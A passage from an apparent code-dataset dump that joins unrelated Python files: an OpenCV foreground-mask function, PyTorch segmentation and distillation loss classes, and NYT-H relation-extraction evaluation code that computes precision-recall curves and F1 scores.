        print("%s\t%d\t%f" % (name, cnt, float(cnt) / total))
if __name__ == "__main__":
_main(sys.argv[1:])
| StarcoderdataPython |
8017931 | <gh_stars>0
import cv2
import numpy as np
def draw_mask(img, image_bg, bbox, labels):
    """Build a binary foreground mask for `img` by differencing each
    detected box against a background image.

    For every bounding box: normalize the object crop and the background
    crop to [0, 1], take their absolute difference in grayscale, smooth
    with a 5x5 Gaussian, Otsu-threshold, and paste the per-box mask into
    a full-frame single-channel mask. Returns that mask as a 3-channel
    image.

    :param img:      frame containing the detected objects (assumed BGR --
                     confirm with caller)
    :param image_bg: background frame of the same size
    :param bbox:     iterable of [x1, y1, x2, y2] boxes
    :param labels:   one label per box (only its length is used)
    """
    # Kept for backwards compatibility: earlier callers read these from
    # the module after calling draw_mask().
    global mask
    global masked_img
    alpha = 0.95
    mask = []
    bbox = np.array(bbox)
    print('bbox: ' + str(bbox) + '\n')
    # Full-frame accumulator for the per-box masks.
    masked_bg = np.full((img.shape[0], img.shape[1]), 0, dtype="uint8")
    for i, _label in enumerate(labels):
        x1, y1, x2, y2 = bbox[i][0], bbox[i][1], bbox[i][2], bbox[i][3]
        crop_obj = img[y1:y2, x1:x2]
        crop_obj = cv2.normalize(crop_obj.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)
        crop_bg = image_bg[y1:y2, x1:x2]
        crop_bg = cv2.normalize(crop_bg.astype('float'), None, 0.0, 1.0, cv2.NORM_MINMAX)
        try:
            # Kept from the original implementation even though the blend
            # result is not used further down.
            crop_bg_w = alpha * crop_bg + (1 - alpha) * crop_obj
        # Fixed: was a bare `except:` whose handler printed crop_bg_w --
        # the very value whose computation just failed -- raising a
        # NameError inside the handler and masking the real error.
        except Exception:
            print('NoneType!')
            print('bg:' + str(crop_bg) + '\nobj:' + str(crop_obj))
            exit()
        # |object - background| in grayscale, scaled back to 0..255.
        mask = cv2.cvtColor((abs(crop_obj - crop_bg) * 255).astype(np.uint8), cv2.COLOR_BGR2GRAY)
        # Otsu's thresholding after Gaussian filtering.
        blur = cv2.GaussianBlur(mask, (5, 5), 0)
        ret3, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
        mask = th3
        # Paste the per-box mask into the full-frame mask.
        masked_bg[y1:y2, x1:x2] = mask
        masked_img = cv2.cvtColor(masked_bg, cv2.COLOR_GRAY2RGB)
    return masked_img
6408510 | import torch
import torch.nn as nn
import torch.nn.functional as F
from . import metric_utils
class DiceLoss():
    '''Soft Dice loss: 1 - mean Dice score over the batch.

    http://campar.in.tum.de/pub/milletari2016Vnet/milletari2016Vnet.pdf
    https://github.com/faustomilletari/VNet/blob/master/pyLayer.py
    https://github.com/pytorch/pytorch/issues/1249
    '''

    def __init__(self):
        self.__class__.__name__ = 'Dice'

    def __call__(self, output, target):
        # Dice score lies in [0, 1]; the loss is its complement.
        return 1.0 - get_torch_dice_score(output, target)
class DiceBCELoss():
    """Convex combination of soft Dice loss and binary cross-entropy;
    `dice_weight` controls the mix (bce_weight = 1 - dice_weight)."""

    def __init__(self, dice_weight=1.0):
        self.__class__.__name__ = 'DiceBCE'
        self.dice_weight = dice_weight
        self.bce_weight = 1.0 - dice_weight

    def __call__(self, output, target):
        bce_term = F.binary_cross_entropy(output, target)
        dice_term = 1 - get_torch_dice_score(output, target)
        return self.dice_weight * dice_term + self.bce_weight * bce_term
class WeightedBCELoss():
    """Binary cross-entropy with fixed per-element rescaling weights."""

    def __init__(self, weights):
        self.weights = weights
        self.__class__.__name__ = 'WeightedBCE'

    def __call__(self, output, target):
        # `weight` rescales each element's contribution to the mean loss.
        return F.binary_cross_entropy(output, target, weight=self.weights)
class KnowledgeDistillLoss():
    """Knowledge-distillation loss: down-weighted BCE against the hard
    targets plus full-weight BCE against the teacher's soft targets."""

    def __init__(self, target_weight=0.25):
        self.__class__.__name__ = 'KnowledgeDistill'
        self.target_weight = target_weight

    def __call__(self, output, target, soft_target):
        hard_loss = F.binary_cross_entropy(output, target) * self.target_weight
        soft_loss = F.binary_cross_entropy(output, soft_target)
        return hard_loss + soft_loss
class HuberLoss():
    """Pseudo-Huber transform applied to binary cross-entropy:
    c^2 * (sqrt(1 + (bce/c)^2) - 1)."""

    def __init__(self, c=0.5):
        self.c = c
        self.__class__.__name__ = 'Huber'

    def __call__(self, output, target):
        bce = F.binary_cross_entropy(output, target)
        scaled_sq = (bce / self.c) ** 2
        return self.c ** 2 * (torch.sqrt(1 + scaled_sq) - 1)
class SmoothF2Loss():
    """Weighted sum of a differentiable (sigmoid-smoothed) F2 surrogate
    and binary cross-entropy; `c` is the sigmoid steepness."""

    def __init__(self, c=10.0, f2_weight=0.2, bce_weight=1.0):
        self.__class__.__name__ = 'SmoothF2'
        self.c = c
        self.f2_weight = f2_weight
        self.bce_weight = bce_weight

    def __call__(self, output, target, thresholds):
        f2_term = self.f2_weight * get_smooth_f2_score(output, target, thresholds, self.c)
        bce_term = self.bce_weight * F.binary_cross_entropy(output, target)
        return f2_term + bce_term
class L2Norm(nn.Module):
    """Channel-wise L2 normalization with a learnable per-channel scale
    (as used in SSD/ParseNet).

    Each spatial position's channel vector is normalized to unit L2 norm
    and then multiplied by a learnable per-channel weight initialized to
    `scale`.
    """
    def __init__(self, n_channels, scale):
        super().__init__()
        self.n_channels = n_channels
        # NOTE(review): `scale or None` maps scale=0 to None, which makes
        # reset_parameters fail; behavior preserved from the original.
        self.gamma = scale or None
        self.eps = 1e-10
        self.weight = nn.Parameter(torch.Tensor(self.n_channels))
        self.reset_parameters()

    def reset_parameters(self):
        # Fixed: nn.init.constant was deprecated and later removed;
        # constant_ is the supported in-place initializer.
        nn.init.constant_(self.weight, self.gamma)

    def forward(self, x):
        # L2 norm over the channel dim; eps guards against division by zero.
        norm = x.pow(2).sum(dim=1, keepdim=True).sqrt() + self.eps
        # Fixed: the original `x /= norm` mutated the caller's tensor
        # in place (and breaks autograd on leaf inputs).
        x = x / norm
        return self.weight.unsqueeze(0).unsqueeze(2).unsqueeze(3).expand_as(x) * x
# Helpers / Shared Methods
def get_torch_dice_score(outputs, targets):
    """Mean soft Dice score over the batch: 2*|A.B| / (sum A + sum B),
    computed per sample on flattened tensors."""
    eps = 1e-7
    n = outputs.size()[0]
    flat_out = outputs.view(n, -1)
    flat_tgt = targets.view(n, -1)
    denom = flat_out.sum(dim=1) + flat_tgt.sum(dim=1)
    overlap = (flat_out * flat_tgt).sum(dim=1).float()
    return torch.mean(2.0 * overlap / (denom + eps))
def sigmoid(z, c=1.0):
    """Logistic function with steepness `c`: 1 / (1 + exp(-c*z))."""
    return (1.0 + torch.exp(-c * z)).reciprocal()
def get_smooth_f2_score(outputs, targets, thresholds, c=10.0):
    """Differentiable F2 surrogate, averaged over the batch.

    Hard thresholding is replaced by a steep sigmoid of
    (thresholds - outputs), so an output *below* its threshold counts as
    a soft positive — this orientation is kept from the original
    implementation. F2 = 5*P*R / (4*P + R).
    """
    eps = 1e-9
    soft_pos = sigmoid(thresholds - outputs, c).float()
    tot_pred_pos = torch.sum(soft_pos, dim=1)
    tot_true_pos = torch.sum(targets, dim=1)
    TP = torch.sum(soft_pos * targets, dim=1)
    P = TP / (tot_pred_pos + eps)
    # Fixed: the original computed `TP / tot_tar_pos + eps`, adding eps
    # *after* the division (operator-precedence bug) and dividing by zero
    # for rows with no positive targets; parenthesized like the P term.
    R = TP / (tot_true_pos + eps)
    F2 = 5.0 * (P * R / (4 * P + R))
    return torch.mean(F2)
4983589 | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
# @Version : Python 3.6
import os
import pdb
import json
import argparse
import warnings
from collections import OrderedDict
from functools import total_ordering
from itertools import combinations
import torch
import torch.nn.functional as F
import numpy as np
from sklearn import metrics
from sklearn.exceptions import UndefinedMetricWarning
from tqdm import tqdm
from helper import load_line_json
# Silence sklearn's UndefinedMetricWarning (raised on zero-division in
# precision/recall/F1 computations) for the whole run.
warnings.filterwarnings(action="ignore", category=UndefinedMetricWarning)
@total_ordering
class Threshold(object):
    """A (threshold, predicted label, gold label) triple, ordered by
    threshold value; used to build precision-recall curves."""

    def __init__(self, threshold, label, true_label):
        self.th = threshold
        self.label = label
        self.true_label = true_label
        # 1 when the prediction matches the gold label, else 0.
        self.flag = int(self.label == self.true_label)

    def __eq__(self, obj):
        return self.th == obj.th

    def __lt__(self, obj):
        return self.th < obj.th
def compute_metrics_nyth(labels, preds, ids, target_names):
    r"""Compute NYT-H evaluation metrics: accuracy, macro and micro
    precision/recall/F1, their macro averages over non-NA relations,
    and the full per-class classification report."""
    results = OrderedDict()
    results['acc'] = (preds == labels).mean()
    for avg in ('macro', 'micro'):
        results['%s-f1' % avg] = metrics.f1_score(labels, preds, average=avg)
        results['%s-recall' % avg] = metrics.recall_score(labels, preds, average=avg)
        results['%s-precision' % avg] = metrics.precision_score(labels, preds, average=avg)
    report = metrics.classification_report(labels, preds,
                                           digits=4, labels=ids,
                                           target_names=target_names, output_dict=True)
    # Macro-average P/R/F1 over every real relation, excluding 'NA'.
    relations = set(target_names)
    precisions, recalls, f1_scores = [], [], []
    for name, scores in report.items():
        if name in relations and name != 'NA':
            precisions.append(scores['precision'])
            recalls.append(scores['recall'])
            f1_scores.append(scores['f1-score'])
    results['non_na_macro_precision'] = sum(precisions) / len(precisions)
    results['non_na_macro_recall'] = sum(recalls) / len(recalls)
    results['non_na_macro_f1'] = sum(f1_scores) / len(f1_scores)
    results['report'] = report
    return results
def evaluate_nyth(model, criterion, logger, processor, config, dataset_name, prefix=""):
    r"""Evaluate *model* on one NYT-H split and dump PR-curve artifacts.

    Runs the model over the ``train``/``dev``/``test`` loader selected by
    *dataset_name* under ``torch.no_grad()``, then computes classification
    metrics, several precision-recall curves and their AUCs, and the
    DSGT/MAGT macro scores.  Curve points and per-instance predictions are
    written under ``<config.output_dir>/eval``.

    Returns:
        tuple: (results dict, mean eval loss, preds array, labels array,
        outs array of per-class probabilities/scores).
    """
    eval_output_dir = os.path.join(config.output_dir, "eval")
    if not os.path.exists(eval_output_dir):
        os.makedirs(eval_output_dir)
    number_of_total_examples = {
        'train': processor.num_train_examples,
        'dev': processor.num_dev_examples,
        'test': processor.num_test_examples,
    }
    logger.info(f"***** Running evaluation {prefix} *****")
    logger.info(f"  Num examples = {number_of_total_examples[dataset_name]}")
    results = dict()
    eval_loss = 0.0
    nb_eval_steps = 0
    preds = list()
    labels = list()
    outs = list()
    tokens = list()
    instance_ids = list()
    bag_ids = list()
    data_loaders = {
        "train": processor.train_loader,
        "dev": processor.dev_loader,
        "test": processor.test_loader
    }
    data_loader = data_loaders[dataset_name]
    with torch.no_grad():
        model.eval()
        r"""opennre"""
        pred_result = list()
        r"""end of opennre"""
        for raw_batch in tqdm(data_loader, desc="Evaluating", ncols=60):
            # Sentence-level batches carry 2 trailing non-tensor fields,
            # bag-level batches carry 3 (the extra one being the scopes).
            if config.task_name == 'sent':
                batch = tuple(t.to(config.device) for t in raw_batch[:-2])
                rel_labels = batch[4]
                bag_labels = batch[5]
                instance_id = raw_batch[6]
                bag_id = raw_batch[7]
                inputs = {
                    "token2ids": batch[0],
                    "pos1s": batch[1],
                    "pos2s": batch[2],
                    "mask": batch[3],
                }
            elif config.task_name == 'bag':
                batch = tuple(t.to(config.device) for t in raw_batch[:-3])
                rel_labels = batch[4]
                bag_labels = batch[5]
                instance_id = raw_batch[6]
                bag_id = raw_batch[7]
                inputs = {
                    "token2ids": batch[0],
                    "pos1s": batch[1],
                    "pos2s": batch[2],
                    "mask": batch[3],
                    "scopes": raw_batch[8],
                    "is_training": False,
                    "rel_labels": rel_labels,
                }
            else:
                raise NotImplementedError
            instance_ids.extend(instance_id)
            bag_ids.extend(bag_id)
            out = model(**inputs)
            loss = criterion(out, rel_labels)
            eval_loss += loss.item()
            nb_eval_steps += 1
            _, pred = torch.max(out, dim=1) # replace softmax with max function, same results
            pred = pred.cpu().numpy().reshape((-1, 1))
            rel_labels = rel_labels.cpu().numpy().reshape((-1, 1))
            bag_labels = bag_labels.cpu().numpy().reshape((-1, 1))
            for x in batch[0].cpu().numpy():
                tokens.append(" ".join([processor.id2word[y] for y in x.tolist()]))
            # Bag models other than the `_one` variants already emit
            # probabilities, so only softmax where raw logits are expected.
            if config.task_name == 'sent' or (config.task_name == 'bag' \
                and '_one' in config.model_name):
                softmax_out = torch.softmax(out.cpu().detach(), dim=-1)
            else:
                softmax_out = out.cpu().detach() # reference from opennre
            outs.append(softmax_out.numpy())
            preds.append(pred)
            labels.append(rel_labels)
            r"""opennre"""
            # One scored entry per (instance, non-NA relation); gold entries
            # additionally record the human bag label when available.
            for i in range(softmax_out.size(0)):
                for relid in range(processor.class_num):
                    if processor.id2rel[relid] != 'NA':
                        pred_ins = {
                            'label': int(rel_labels[i].item() == relid),
                            'score': softmax_out[i][relid].item(),
                            'pred_label': relid
                        }
                        if rel_labels[i].item() == relid:
                            if bag_labels[i] == 1:
                                pred_ins.update({"b_label": 1})
                            elif bag_labels[i] == 0:
                                pred_ins.update({"b_label": 0})
                        pred_result.append(pred_ins)
            r"""end of opennre"""
    eval_loss = eval_loss / nb_eval_steps
    outs = np.concatenate(outs, axis=0).astype(np.float32)
    preds = np.concatenate(preds, axis=0).reshape(-1).astype(np.int64)
    labels = np.concatenate(labels, axis=0).reshape(-1).astype(np.int64)
    id2rel = processor.id2rel
    ids = list(range(len(id2rel)))
    target_names = [id2rel[ind] for ind in ids]
    results = compute_metrics_nyth(labels, preds, ids, target_names)
    """Precision-Recall Curve (Ours)"""
    probs = torch.tensor(outs)
    # just take the probs in the max position
    thresholds, indices = probs[:,1:].max(dim=1)
    indices += 1
    ppp, rrr, _ = metrics.precision_recall_curve(labels==indices.cpu().detach().numpy(), thresholds)
    with open(os.path.join(eval_output_dir, 'prc_skprc_mine.json'), 'wt', encoding='utf-8') as fout:
        json.dump({'precision': ppp.tolist(), 'recall': rrr.tolist()}, fout, ensure_ascii=False)
    thresholds = thresholds.numpy()
    indices = indices.numpy()
    th_objs = list()
    for th, lb, truth in zip(thresholds, indices, labels):
        th_objs.append(Threshold(th, lb, truth))
    # Sweep predictions from highest to lowest confidence, accumulating
    # precision/recall after each one.
    th_list_sorted = sorted(th_objs, reverse=True)
    tot_len = len(thresholds)
    correct = 0
    ps = list()
    rs = list()
    ths = list()
    for ind, th in enumerate(th_list_sorted):
        correct += th.flag
        ps.append(float(correct)/(ind + 1))
        rs.append(float(correct)/tot_len)
        ths.append(float(th.th))
    with open(os.path.join(eval_output_dir, "prc.json"), 'wt', encoding='utf-8') as fout:
        json.dump({
            "precision": ps,
            "recall": rs,
            "threshold": ths,
        }, fout, ensure_ascii=False)
    results['auc'] = metrics.auc(rs, ps)
    r"""opennre"""
    sorted_pred_result = sorted(pred_result, key=lambda x: x['score'], reverse=True)
    prec = []
    rec = []
    correct = 0
    # import ipdb; ipdb.set_trace()
    # Recall denominator: number of instances whose gold relation is non-NA.
    tot_count_flags = labels.copy()
    tot_count_flags[tot_count_flags > 0] = 1
    tot_count = int(tot_count_flags.sum())
    # take `all` non-na probs
    correct_k_with_rel = {"k": list(), "covered_rel": list()}
    correct_covered_rel = set()
    all_k_with_rel = {"k": list(), "covered_rel": list()}
    all_covered_rel = set()
    for i, item in enumerate(sorted_pred_result):
        correct += item['label']
        prec.append(float(correct) / float(i + 1))
        rec.append(float(correct) / float(tot_count))
        if item['label'] > 0:
            correct_covered_rel.add(item['pred_label'])
            correct_k_with_rel['k'].append(i + 1)
            correct_k_with_rel['covered_rel'].append(len(correct_covered_rel))
        all_covered_rel.add(item['pred_label'])
        all_k_with_rel['k'].append(i + 1)
        all_k_with_rel['covered_rel'].append(len(all_covered_rel))
    non_na_auc = metrics.auc(x=rec, y=prec)
    np_prec = np.array(prec)
    np_rec = np.array(rec)
    with open(os.path.join(eval_output_dir, "prc_opennre.json"), 'wt', encoding='utf-8') as fout:
        json.dump({
            "precision": prec,
            "recall": rec,
        }, fout, ensure_ascii=False)
    with open(os.path.join(eval_output_dir, "k_covered_rel.json"), 'wt', encoding='utf-8') as fout:
        json.dump({
            "correct": correct_k_with_rel,
            "all": all_k_with_rel,
        }, fout, ensure_ascii=False)
    # Best F1 over the curve; 1e-20 guards against division by zero.
    max_f1 = (2 * np_prec * np_rec / (np_prec + np_rec + 1e-20)).max()
    mean_prec = np_prec.mean()
    results['non_na_auc'] = non_na_auc
    results['max_f1'] = max_f1
    results['mean_prec'] = mean_prec
    r"""end of opennre"""
    # -------------------------------------------------------------------------------------------------
    # Same curve again, but restricted to entries that carry a human bag
    # label (only available on the test split of the bag track).
    if dataset_name == 'test' and config.task_name == "bag":
        """opennre for bag_labels"""
        b_pred_result = list(filter(lambda x: "b_label" in x, pred_result))
        b_sorted_pred_result = sorted(b_pred_result, key=lambda x: x['score'], reverse=True)
        b_prec = []
        b_rec = []
        b_correct = 0
        b_tot_count = sum([x['b_label'] for x in b_sorted_pred_result])
        # take `all` non-na probs
        for i, item in enumerate(b_sorted_pred_result):
            b_correct += item['b_label']
            b_prec.append(float(b_correct) / float(i + 1))
            b_rec.append(float(b_correct) / float(b_tot_count))
            if i + 1 in [50, 100, 200, 300, 400, 500, 1000, 2000]:
                results[f'b_P@{i + 1}'] = float(b_correct) / float(i + 1)
        b_non_na_auc = metrics.auc(x=b_rec, y=b_prec)
        np_b_prec = np.array(b_prec)
        np_b_rec = np.array(b_rec)
        with open(os.path.join(eval_output_dir, "b_prc_opennre.json"), 'wt', encoding='utf-8') as fout:
            json.dump({
                "precision": b_prec,
                "recall": b_rec,
            }, fout, ensure_ascii=False)
        b_max_f1 = (2 * np_b_prec * np_b_rec / (np_b_prec + np_b_rec + 1e-20)).max()
        b_mean_prec = np_b_prec.mean()
        results['b_non_na_auc'] = b_non_na_auc
        results['b_max_f1'] = b_max_f1
        results['b_mean_prec'] = b_mean_prec
        """end of opennre for bag_labels"""
    # -------------------------------------------------------------------------------------------------
    # Dump one JSON record per instance (note: `fin` is actually a writer).
    with open(os.path.join(eval_output_dir, 'eval_mc.txt'), 'wt', encoding='utf-8') as fin:
        for ins_id, bag_id, l, t, p in zip(instance_ids, bag_ids, labels, tokens, preds):
            rel2results = OrderedDict()
            for rel in processor.rel2id:
                if rel != 'NA':
                    if rel == processor.id2rel[p]:
                        rel2results[rel] = True
                    else:
                        rel2results[rel] = False
            l = processor.id2rel[l]
            p = processor.id2rel[p]
            result = OrderedDict()
            result["instance_id"] = ins_id
            result["bag_id"] = bag_id
            result["result"] = str(l==p)
            result["label"] = l
            result["pred"] = p
            result["tokens"] = t
            result["rel2result"] = rel2results
            fin.write('{}\n'.format(json.dumps(result)))
    ds_p, ds_r, ds_f1 = compute_dsgt(labels, preds, processor.rel2id, verbose=False)
    results.update({"dsgt_p": ds_p, "dsgt_r": ds_r, "dsgt_f1": ds_f1})
    # MAGT scores need the manual annotations, only defined on the test set.
    if dataset_name == 'test':
        idname = "bag_id" if config.task_name == "bag" else "instance_id"
        id2results = dict()
        with open(os.path.join(eval_output_dir, 'eval_mc.txt'), 'r', encoding='utf-8') as fin:
            for line in fin:
                ins = json.loads(line)
                id2results[ins[idname]] = ins
        ma_p, ma_r, ma_f1 = compute_magt(labels, preds, config.task_name,
            processor.rel2id, processor.test_dataset.data, id2results, verbose=False)
        results.update({"magt_p": ma_p, "magt_r": ma_r, "magt_f1": ma_f1})
    logger.info("***** {} Eval results {} *****".format(dataset_name, prefix))
    for key in sorted(results.keys()):
        logger.info("  %s = %s", key, str(results[key]))
    return results, eval_loss, preds, labels, outs
def evaluate_crcnn(model, criterion, logger, processor, config, dataset_name, prefix=""):
    r"""Evaluate a CR-CNN-style ranking model on one NYT-H split.

    Unlike :func:`evaluate_nyth`, predictions come from the maximum score
    over the non-NA classes; an instance is assigned 'NA' (class 0) when its
    best non-NA score is negative.  Per-instance predictions are written to
    ``<config.output_dir>/eval/eval_mc.txt`` and DSGT/MAGT scores are added
    to the results.

    Returns:
        tuple: (results dict, mean eval loss, preds array, labels array,
        outs array of raw per-class scores).
    """
    eval_output_dir = os.path.join(config.output_dir, "eval")
    if not os.path.exists(eval_output_dir):
        os.makedirs(eval_output_dir)
    number_of_total_examples = {
        'train': processor.num_train_examples,
        'dev': processor.num_dev_examples,
        'test': processor.num_test_examples,
    }
    logger.info(f"***** Running evaluation {prefix} *****")
    logger.info(f"  Num examples = {number_of_total_examples[dataset_name]}")
    results = dict()
    eval_loss = 0.0
    nb_eval_steps = 0
    preds = list()
    labels = list()
    outs = list()
    tokens = list()
    instance_ids = list()
    bag_ids = list()
    data_loaders = {
        "train": processor.train_loader,
        "dev": processor.dev_loader,
        "test": processor.test_loader
    }
    data_loader = data_loaders[dataset_name]
    with torch.no_grad():
        model.eval()
        for raw_batch in tqdm(data_loader, desc="Evaluating", ncols=60):
            batch = tuple(t.to(config.device) for t in raw_batch[:-2])
            inputs = {
                "token2ids": batch[0],
                "pos1s": batch[1],
                "pos2s": batch[2],
                "mask": batch[3],
            }
            rel_labels = batch[4]
            bag_labels = batch[5]
            instance_id = raw_batch[6]
            bag_id = raw_batch[7]
            instance_ids.extend(instance_id)
            bag_ids.extend(bag_id)
            out = model(**inputs)
            loss = criterion(out, rel_labels)
            eval_loss += loss.item()
            nb_eval_steps += 1
            # Best non-NA class (index shifted by 1 to skip class 0 == NA) ...
            scores, pred = torch.max(out[:, 1:], dim=1)
            pred = pred + 1
            scores = scores.cpu().numpy().reshape((-1, 1))
            pred = pred.cpu().numpy().reshape((-1, 1))
            # ... falling back to NA when even the best score is negative.
            for i in range(pred.shape[0]):
                if scores[i][0] < 0:
                    pred[i][0] = 0
            rel_labels = rel_labels.cpu().numpy().reshape((-1, 1))
            for x in batch[0].cpu().numpy():
                tokens.append(" ".join([processor.id2word[y] for y in x.tolist()]))
            outs.append(out.detach().cpu().numpy())
            preds.append(pred)
            labels.append(rel_labels)
    eval_loss = eval_loss / nb_eval_steps
    outs = np.concatenate(outs, axis=0).astype(np.float32)
    preds = np.concatenate(preds, axis=0).reshape(-1).astype(np.int64)
    labels = np.concatenate(labels, axis=0).reshape(-1).astype(np.int64)
    id2rel = processor.id2rel
    ids = list(range(len(id2rel)))
    target_names = [id2rel[ind] for ind in ids]
    results = compute_metrics_nyth(labels, preds, ids, target_names)
    # Dump one JSON record per instance (note: `fin` is actually a writer).
    with open(os.path.join(eval_output_dir, 'eval_mc.txt'), 'wt', encoding='utf-8') as fin:
        for ins_id, bag_id, l, t, p in zip(instance_ids, bag_ids, labels, tokens, preds):
            rel2results = OrderedDict()
            for rel in processor.rel2id:
                if rel != 'NA':
                    if rel == processor.id2rel[p]:
                        rel2results[rel] = True
                    else:
                        rel2results[rel] = False
            l = processor.id2rel[l]
            p = processor.id2rel[p]
            result = OrderedDict()
            result["instance_id"] = ins_id
            result["bag_id"] = bag_id
            result["result"] = str(l==p)
            result["label"] = l
            result["pred"] = p
            result["tokens"] = t
            result["rel2result"] = rel2results
            fin.write('{}\n'.format(json.dumps(result)))
    ds_p, ds_r, ds_f1 = compute_dsgt(labels, preds, processor.rel2id, verbose=False)
    results.update({"dsgt_p": ds_p, "dsgt_r": ds_r, "dsgt_f1": ds_f1})
    # MAGT scores need the manual annotations, only defined on the test set.
    if dataset_name == 'test':
        id2results = dict()
        with open(os.path.join(eval_output_dir, 'eval_mc.txt'), 'r', encoding='utf-8') as fin:
            for line in fin:
                ins = json.loads(line)
                id2results[ins['instance_id']] = ins
        ma_p, ma_r, ma_f1 = compute_magt(labels, preds, config.task_name,
            processor.rel2id, processor.test_dataset.data, id2results, verbose=False)
        results.update({"magt_p": ma_p, "magt_r": ma_r, "magt_f1": ma_f1})
    logger.info("***** {} Eval results {} *****".format(dataset_name, prefix))
    for key in sorted(results.keys()):
        logger.info("  %s = %s", key, str(results[key]))
    return results, eval_loss, preds, labels, outs
def evaluate_bag2sent(model, criterion, logger, processor, config, dataset_name, prefix=""):
    r"""Evaluate a bag-trained model sentence-by-sentence (bag2sent track).

    Only the test loader is supported.  Computes the standard metrics, a
    max-score precision-recall curve, opennre-style non-NA curve statistics,
    and DSGT/MAGT scores; per-instance predictions go to
    ``<config.output_dir>/eval/eval_mc_bag2sent.txt``.

    Returns:
        tuple: (results dict, mean eval loss, preds array, labels array,
        outs array of per-class scores).
    """
    eval_output_dir = os.path.join(config.output_dir, "eval")
    if not os.path.exists(eval_output_dir):
        os.makedirs(eval_output_dir)
    logger.info(f"***** Running evaluation {prefix} *****")
    logger.info(f"  Num examples = {processor.num_test_examples}")
    results = dict()
    eval_loss = 0.0
    nb_eval_steps = 0
    preds = list()
    labels = list()
    outs = list()
    tokens = list()
    instance_ids = list()
    bag_ids = list()
    data_loaders = {
        "test": processor.test_loader
    }
    data_loader = data_loaders[dataset_name]
    with torch.no_grad():
        r"""opennre"""
        pred_result = list()
        r"""end of opennre"""
        for raw_batch in tqdm(data_loader, desc="Evaluating", ncols=60):
            model.eval()
            if config.task_name == 'bag2sent':
                batch = tuple(t.to(config.device) for t in raw_batch[:-3])
                rel_labels = batch[4]
                bag_labels = batch[5]
                instance_id = raw_batch[6]
                bag_id = raw_batch[7]
                inputs = {
                    "token2ids": batch[0],
                    "pos1s": batch[1],
                    "pos2s": batch[2],
                    "mask": batch[3],
                    "scopes": raw_batch[8],
                    "is_training": False,
                    "rel_labels": rel_labels,
                }
                instance_ids.extend(instance_id)
                bag_ids.extend(bag_id)
            else:
                raise NotImplementedError
            out = model(**inputs)
            loss = criterion(out, rel_labels)
            eval_loss += loss.item()
            nb_eval_steps += 1
            _, pred = torch.max(out, dim=1) # replace softmax with max function, same results
            pred = pred.cpu().numpy().reshape((-1, 1))
            rel_labels = rel_labels.cpu().numpy().reshape((-1, 1))
            for x in batch[0].cpu().numpy():
                tokens.append(" ".join([processor.id2word[y] for y in x.tolist()]))
            outs.append(out.detach().cpu().numpy())
            preds.append(pred)
            labels.append(rel_labels)
            r"""opennre"""
            # One scored entry per (instance, non-NA relation).
            for i in range(out.size(0)):
                for relid in range(processor.class_num):
                    if processor.id2rel[relid] != 'NA':
                        pred_result.append({
                            'label': int(rel_labels[i].item() == relid),
                            'score': out[i][relid].item()
                        })
            r"""end of opennre"""
    eval_loss = eval_loss / nb_eval_steps
    outs = np.concatenate(outs, axis=0).astype(np.float32)
    preds = np.concatenate(preds, axis=0).reshape(-1).astype(np.int64)
    labels = np.concatenate(labels, axis=0).reshape(-1).astype(np.int64)
    id2rel = processor.id2rel
    ids = list(range(len(id2rel)))
    target_names = [id2rel[ind] for ind in ids]
    results = compute_metrics_nyth(labels, preds, ids, target_names)
    """Precision-Recall Curve"""
    probs = torch.tensor(outs)
    thresholds, indices = probs[:,1:].max(dim=1)
    indices += 1
    # NOTE(review): the next line overwrites the non-NA max above with a max
    # over ALL classes (including NA), so the two preceding lines are dead
    # code here — confirm which behaviour was intended.
    thresholds, indices = probs.max(dim=1)
    thresholds = thresholds.numpy()
    indices = indices.numpy()
    th_objs = list()
    for th, lb, truth in zip(thresholds, indices, labels):
        th_objs.append(Threshold(th, lb, truth))
    # Sweep predictions from highest to lowest confidence.
    th_list_sorted = sorted(th_objs, reverse=True)
    tot_len = len(thresholds)
    correct = 0
    ps = list()
    rs = list()
    ths = list()
    for ind, th in enumerate(th_list_sorted):
        correct += th.flag
        ps.append(float(correct)/(ind + 1))
        rs.append(float(correct)/tot_len)
        ths.append(float(th.th))
    with open(os.path.join(eval_output_dir, "prc_bag2sent.json"), 'wt', encoding='utf-8') as fout:
        json.dump({
            "precision": ps,
            "recall": rs,
            "threshold": ths,
        }, fout, ensure_ascii=False)
    results['auc'] = metrics.auc(rs, ps)
    r"""opennre"""
    sorted_pred_result = sorted(pred_result, key=lambda x: x['score'], reverse=True)
    prec = []
    rec = []
    correct = 0
    total = processor.num_test_examples
    for i, item in enumerate(sorted_pred_result):
        correct += item['label']
        prec.append(float(correct) / float(i + 1))
        rec.append(float(correct) / float(total))
    non_na_auc = metrics.auc(x=rec, y=prec)
    np_prec = np.array(prec)
    np_rec = np.array(rec)
    # Best F1 over the curve; 1e-20 guards against division by zero.
    max_f1 = (2 * np_prec * np_rec / (np_prec + np_rec + 1e-20)).max()
    mean_prec = np_prec.mean()
    results['non_na_auc'] = non_na_auc
    results['max_f1'] = max_f1
    results['mean_prec'] = mean_prec
    r"""end of opennre"""
    # Dump one JSON record per instance (note: `fin` is actually a writer).
    with open(os.path.join(eval_output_dir, 'eval_mc_bag2sent.txt'), 'wt', encoding='utf-8') as fin:
        for ins_id, bag_id, l, t, p in zip(instance_ids, bag_ids, labels, tokens, preds):
            rel2results = OrderedDict()
            for rel in processor.rel2id:
                if rel != 'NA':
                    if rel == processor.id2rel[p]:
                        rel2results[rel] = True
                    else:
                        rel2results[rel] = False
            l = processor.id2rel[l]
            p = processor.id2rel[p]
            result = OrderedDict()
            result["instance_id"] = ins_id
            result["bag_id"] = bag_id
            result["result"] = str(l==p)
            result["label"] = l
            result["pred"] = p
            result["tokens"] = t
            result["rel2result"] = rel2results
            fin.write('{}\n'.format(json.dumps(result)))
    ds_p, ds_r, ds_f1 = compute_dsgt(labels, preds, processor.rel2id, verbose=False)
    results.update({"dsgt_p": ds_p, "dsgt_r": ds_r, "dsgt_f1": ds_f1})
    # MAGT scores need the manual annotations, only defined on the test set.
    if dataset_name == "test":
        id2results = dict()
        with open(os.path.join(eval_output_dir, 'eval_mc_bag2sent.txt'), 'r', encoding='utf-8') as fin:
            for line in fin:
                ins = json.loads(line)
                id2results[ins['instance_id']] = ins
        ma_p, ma_r, ma_f1 = compute_magt(labels, preds, "bag2sent",
            processor.rel2id, processor.test_dataset.data,
            id2results, verbose=False)
